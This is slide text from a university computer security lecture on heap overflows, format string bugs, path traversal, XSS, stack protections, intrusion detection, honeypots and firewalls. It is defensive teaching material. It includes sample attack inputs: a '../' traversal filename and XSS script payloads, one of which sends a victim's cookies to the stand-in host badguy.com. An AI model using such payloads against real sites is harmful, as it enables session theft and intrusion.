CMSC 414 Computer and Network Security Lecture 25 Jonathan Katz Heap overflows The heap is dynamically-allocated memory – E.g., created using malloc Cannot overwrite the return address (as on the stack), but can still cause havoc, e.g.: static char buf[16], *filename; filename = “file.txt”; … f = fopen(filename, “w+r”); Overflowing buf could change the address to which filename points Heap overflows Can also exploit heap overflows to affect function pointers – Again, possibly change the address to which the function pointer points – Can potentially cause execution of arbitrary code! Format string vulnerabilities What is the difference between printf(buf); and printf(“%s”, buf); ? What if buf holds %x ? Look at memory, and what printf expects… What happens? printf(“%x”) expects an additional argument… “%x” ebp ret addr buf Frame of the calling function args Will print the value sitting here What if we could write that value instead? – See “Blended attacks…” Other input validation bugs Say a program reads from a user-specified file Program running in directory /secure, but only allows access to files in /secure/pub – Checks that the filename supplied by the user begins with /pub What if the user supplies the filename “/pub/../top_secret” ? XSS attacks Another input validation flaw Say we have a script that echos a user’s name: GET /welcome.cgi?name=Joe HTTP/1.0 Response is: <html><title> Welcome! </title> Hi Joe </html> What if the user supplies the following “name”: <script>alert(document.cookie)</script> XSS attacks If an attacker can cause an honest user to click on a specially-crafted URL, the user’s cookies can be sent to the attacker http://victim.com/welcome.cgi ? name = <script> window.open( “http://badguy.com?cookie = ” + document.cookie ) </script> How would an attacker do this? – Phishing – Link from their webpage – Link to a fake movie, picture, etc. XSS attacks XSS attacks are a potential problem any time user- submitted content is used to generate html Need to perform extensive validation of user- supplied data Simple fixes (like rejecting strings that contain “<script>”) can be circumvented Preventing XSS attacks in general is very hard (impossible(?) if certain functionality is desired) Defenses (briefly!) Secure programming techniques Penetration testing Static analysis Dynamic analysis Prevention techniques Secure programming techniques Validate all input Avoid buffer overflows (off-by-one, unsafe string manipulation functions, …) Intelligent help/error messages Validating input Determine acceptable input, check for match --- don’t just check against list of “non-matches” – Limit maximum length – Watch out for special characters, escape chars. Check bounds on integer values – Check for negative inputs Validating input Filenames – Disallow *, .., etc. Html, URLs, cookies – cf. cross-site scripting attacks Command-line arguments – Even argv[0]… Don’t use printf(userInput) – Use printf(“%s”, userInput) instead… Avoiding buffer overflows Use arrays instead of pointers Avoid strcpy(), strcat(), etc. – Use strncpy(), strncat(), instead – Even these are not perfect… (e.g., no null termination) Make buffers (slightly) longer than necessary to avoid “off-by-one” errors Error messages Minimize feedback – Don’t (over)explain failures to untrusted users – Don’t release version numbers… – Don’t offer “too much” help (suggested filenames, etc.) Static/dynamic analysis Static analysis: run on the source code prior to deployment, can check for known flaws – E.g., flawfinder, cqual Dynamic analysis: try to catch (potential) buffer overflows during program execution Comparison? – Static analysis very useful, but not perfect – Dynamic analysis can be better (in tandem with static analysis), but can slow down execution Dynamic analysis: Libsafe Intercepts all calls to, e.g., strcpy (dest, src) – Validates sufficient space in current stack frame: |frame-pointer – dest| > strlen(src) – If so, executes strcpy; otherwise, terminates application Preventing buffer overflows Basic stack exploit can be prevented by marking stack segment as non-executable, or randomizing stack location Problems: – Does not defend against `return-to-libc’ exploit • Overflow sets ret-addr to address of libc function – Some apps need executable stack (e.g. LISP interpreters) – Does not block more general exploits, like heap overflow StackGuard Embed random “canaries” in stack frames and verify their integrity prior to function return This is actually used! – Helpful, but not foolproof… Frame 2 local canary sfp ret str Frame 1 local canary sfp ret str More methods … Address obfuscation – Encrypt return address on stack by XORing with random string. Decrypt just before returning from function – Attacker needs decryption key to set return address to desired value Intrusion detection Prevention vs. detection Firewalls (and other security mechanisms) aim to prevent intrusion IDS aims to detect intrusion in case it occurs Use both in tandem! – Defense in depth – Full prevention impossible – The sooner intrusion is detected, the less the damage – IDS can also be a deterrent, and can be use to detect weaknesses in other security mechanisms IDS overview Goals of IDS – Detection and response – Deterrence – Recovery – Defense against future attacks Two classes of behavior to be detected – Illegal access by outsiders – Illegal access by insiders IDS tradeoff IDS based on the assumption that attacker behavior is (sufficiently) different from legitimate user behavior In reality, there will be overlap – Some legitimate behavior may appear malicious – Intruder can attempt to disguise their behavior as that of an honest user False positives/negatives False positive – Alarm triggered by acceptable behavior False negative – No alarm triggered by illegal behavior Always a tradeoff between the two… – Note: credit card companies face the same tradeoff Probability density function Profile of Intruder behavior Profile of authorized user behavior Overlap in observed or expected behavior Average behaviour of intruder Average behaviour of authorized user Measurable behaviour parameter False alarms? Say we have an IDS that is 99% accurate – I.e., Pr[alarm | attack] = 0.99 and Pr[no alarm | no attack] = 0.99 An alarm goes off -- what is the probability that an attack is taking place? To increase this probability, what should we focus on improving?? False alarms Say the probability of an attack is 1/1000 Use Bayes’ law: Pr[attack | alarm] = Pr[alarm | attack] Pr[attack] / Pr[alarm] = 0.99 * 0.001 / (0.99 * 0.001 + 0.01 * 0.999) ≈ 0.1 I.e., when an alarm goes off, 90% of the time it will be a false alarm! How best to lower this number? Host-based IDS Monitors events on a single host Can detect both internal and external intrusions Two general approaches – Anomaly detection – Signature (rule-based) detection Anomaly detection Monitor behavior and compare to some “baseline” behavior using statistical tests – Look for deviations from “normal behavior” “Normal behavior” can be defined on a global level or a per-user level “Normal behavior” can be specified by a human, or learned automatically over time Anomaly detection Threshold detection – Looking at frequency of occurrence of various events, within a specific period of time – Even if attacker can thwart this, it will slow the attack Profile-based (statistical anomaly detection) – Look at changes from a user-specific “baseline” – Baseline behavior can be derived from audit records – Can look at outliers from the mean, or more complicated (multivariate) data; in either case, need to define some appropriate metric for when unusual behavior is detected Metric Model Type of Intrusion Detected Login frequency by date Mean and standard and time deviation Intruders are more likely to login during off-hours Frequency of login at different locations Mean and standard deviation Intruders may login from a location that a legitimate user does not Time since last login Markov (time series) Break-in to unused account Length of session Mean and standard deviation Masquerader may run a much shorter or longer session Large amount of data copied to some location Mean and standard deviation Detect attempt to copy large amounts of sensitive data Password failures at login Unusual event/ operational Detect attempt to guess passwords Signature (rule-based) detection Define a set of “bad patterns” (e.g., known exploits or known bad events) Detect these patterns if they occur Anomaly detection ≈ looks for atypical behavior Signature detection ≈ looks for improper behavior Example rules Users should not read files in other users’ personal directories Users must not write to other users’ files Users who log in after hours often use the same files they used earlier Users do not generally open disk devices directly, but rely on higher-level OS utilities Users should not be logged in more than once to the same system Users do not make copies of system programs Distributed host-based IDS Combine information collected at many different hosts in the network One or more machines in the network will collect and analyze the network data – Audit records needs to be sent over the network – Confidentiality and integrity of the data must be preserved – Centralized architecture: single point of data collection/analysis – Decentralized architecture: More than one analysis center – more robust, but must be coordinated Network-based IDS Monitors traffic at selected points on the network – Real time; packet-by-packet Host-based IDS – looks at user behavior, activity on host, local view Network-based IDS – looks at network traffic, global view Sensor types Inline sensor – Inserted in network path; all traffic passes through the sensor Passive sensor – Monitors a copy of network traffic Passive sensor more efficient; inline sensor can block attacks immediately Sensor placement Inside firewall? – Can detect attacks that penetrate firewall – Can detect firewall misconfiguration – Can examine outgoing traffic more easily to detect insider attacks – Can configure based on network resources being accessed (e.g., configure differently for traffic directed to web server) Outside firewall? – Can document attacks (types/locations/number) even if prevented by firewall (can then be handled out-of-band) Honeypots Decoy systems to lure potential attackers – Divert attackers from critical systems – Collect information about attacker’s activity – Delay attacker long enough to respond Since honeypot is not legitimate, any access to the honeypot is suspicious Can have honeypot computers, or even honeypot networks Honeypot placement Outside firewall – Can detect attempted connections to unused IP addresses, port scanning – No risk of compromised system behind firewall – Does not divert internal attackers Fully internal honeypot – Catches internal attacks – Can detect firewall misconfigurations/vulnerabilities – If compromised, run the risk of a compromised system Firewalls Firewalls: overview Provide central “choke point” for all traffic entering and exiting the system Main goals – Service control – what services can be accessed (inbound or outbound) – Behavior control – how services are accessed (e.g., spam filtering, web content filtering) – User/machine control – controls access to services on a per-user/machine level Firewalls: overview Other goals – Auditing (see also intrusion detection) – Network address translation – Can also run security functionality, e.g., IPSec, VPN What they cannot protect against – Do not offer full protection against insider attacks – Users bypassing the firewall to connect to the Internet – Infected devices connecting to network internally Firewalls: overview Positive filter – Allow only traffic meeting certain criteria – I.e., the default is to reject Negative filter – Reject traffic meeting certain criteria – I.e., the default is to accept Need for firewalls? Why not just provision each computer with its own firewall/IDS? – Not cost effective – Different OS’s make management difficult – Patches must be propagated to all machines in the system – Does not protect against insider attacks that extend beyond the local network Defense in depth Packet filtering Apply a set of rules to each incoming/outgoing packet Packet filtering may be based on any part(s) of the traffic header(s), e.g.: – – – – Source/destination IP address Port numbers Flags Network interface (e.g., reject packet with internal IP address if coming from the wrong interface) Disadvantages of packet filtering Can be difficult to configure rules to achieve both usability and security – E.g., ftp uses a dynamically-assigned port number for the data transfer Misconfigurations can be easily exploited Does not examine application-level data No user authentication Does not address inherent TCP/IP vulnerabilities – E.g., address spoofing Stateful firewalls Typical packet filtering applied on a packet-by- packet basis Can also look at context – E.g., maintain list of active TCP connections (useful when port number are dynamically assigned) – E.g., look at sequence numbers and detect replays Can also use global information (e.g., number of packets to/from a particular IP address)